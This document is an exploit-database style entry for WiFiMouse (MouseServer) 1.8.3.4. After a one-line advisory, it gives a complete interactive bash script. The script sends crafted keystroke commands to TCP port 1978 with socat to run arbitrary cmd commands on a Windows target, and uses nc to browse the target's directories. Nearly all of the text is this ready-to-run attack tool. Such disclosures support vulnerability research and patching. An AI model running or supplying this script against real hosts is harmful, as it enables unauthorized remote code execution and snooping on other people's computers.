WiFiMouse version 1.8.3.4 suffers from a remote code execution vulnerability.
dcee2f3f5c3ab2a8df29abd14197cd5010f6cb612ffbe07e1a7870f3004c0108
# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10
#!/bin/bash
printf "
WiFiMouse / MouseServer 1.8.3.4 Exploit
by FEBIN
"
printf "[*] Enter the Target IP Address: "
read TARGET
rce(){
printf "[*] Enter the Command to execute on the Target: "
read CMD
sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}
dirlist(){
echo "[*] User's Home Directory Contents:"
echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-
while $true
do
printf "\nList Directory:> "
read DIR
echo "[+] Contents of $DIR: "
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
done
}
printf "
[1] Remote Command Execution
[2] Directory Listing
"
printf "Enter Your Choice (1 or 2) : "
read CHOICE
if [[ $CHOICE == "1" ]]
then
rce
elif [[ $CHOICE == "2" ]]
then
dirlist
else
echo "[-] Invalid Choice!"
fi